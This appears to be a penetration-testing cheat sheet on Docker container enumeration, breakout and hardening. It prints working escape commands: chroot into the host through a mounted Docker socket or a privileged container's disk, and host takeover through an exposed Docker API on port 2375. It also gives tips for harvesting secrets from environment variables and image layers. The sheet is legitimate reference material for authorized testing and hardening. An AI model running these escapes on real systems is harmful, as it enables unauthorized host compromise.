DOCKER-SECURITY
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Container enumeration, breakout detection and misconfiguration abuse for authorized engagements. Also useful for hardening review.
AM I IN A CONTAINER?#
cat /proc/1/cgroup | grep -i docker
ls -la /.dockerenv # present in most containers
cat /proc/self/status | grep Cap # capability bitmask
systemd-detect-virt -c # container type
ENUMERATION FROM INSIDE#
id; cat /etc/os-release
env # secrets often leak here
cat /proc/self/status # CapEff / CapBnd
mount # look for host mounts
ls -la /var/run/docker.sock # exposed socket = game over
capsh --print # decode capabilities
DANGEROUS EXPOSURES -> BREAKOUT#
Mounted Docker socket (/var/run/docker.sock):
# Full host control: spawn a privileged container mounting host /
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine \
chroot /host sh
--privileged container:
# Mount the host disk device and chroot in
fdisk -l
mount /dev/sda1 /mnt && chroot /mnt
CAP_SYS_ADMIN + no seccomp (cgroup release_agent classic):
# Notify_on_release / release_agent host command execution.
# Modern kernels/runtimes mitigate; test in scope, document impact.
Host namespaces:
--pid=host -> see & signal host processes
--net=host -> access host loopback services
EXPOSED DOCKER API (2375/2376)#
docker -H tcp://TARGET:2375 version
docker -H tcp://TARGET:2375 ps
docker -H tcp://TARGET:2375 run -v /:/host -it alpine chroot /host sh
IMAGE & REGISTRY RECON#
docker history --no-trunc <image> # leaked secrets in layers
dive <image> # inspect layers interactively
trivy image <image> # vuln + secret scan
# Anonymous registry pull test
curl -s http://REGISTRY:5000/v2/_catalog
curl -s http://REGISTRY:5000/v2/<repo>/tags/list
TOOLING#
deepce # Docker Enumeration & Escalation
cdk # container penetration toolkit
amicontained # capability / seccomp / namespace check
trivy / grype # image vulnerability scanning
dockle # image config linter
HARDENING NOTES (blue side)#
- Never mount the Docker socket into a container. - Run rootless; drop all caps, add only what's needed. - Read-only root FS, no-new-privileges, seccomp + AppArmor. - Do not expose the Docker API over TCP without mTLS. - Scan images in CI; pin digests; minimal base images. See also: KUBERNETES-PENTEST, IAC-SECURITY, LINPEAS, EVASION-TECHNIQUES.